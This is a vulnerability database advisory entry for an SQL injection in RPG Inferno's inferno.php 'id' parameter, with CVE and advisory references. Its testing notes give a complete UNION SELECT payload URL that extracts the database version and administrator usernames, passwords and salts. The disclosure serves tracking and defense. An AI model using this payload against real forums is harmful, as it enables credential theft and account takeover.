RPG Inferno inferno.php id Variable SQL Injection

2007-07-10T17:52:43
ID OSVDB:35965
Type osvdb
Reporter OSVDB
Modified 2007-07-10T17:52:43

Description

Manual Testing Notes

http://[target]/forum/inferno.php?do=ScanMember&id=-1'//UNION//ALL//SELECT//1,2,3,4,5,6,7,user(),database(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,concat(username,0x3a,password,0x3a,salt),31,@@version,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47//from//user//where//usergroupid=6//limit//0,1/*

References:

Vendor URL: http://infernotechnologies.net/ Secunia Advisory ID:25986 Other Advisory URL: http://milw0rm.com/exploits/4166 ISS X-Force ID: 35319 CVE-2007-3687 Bugtraq ID: 24839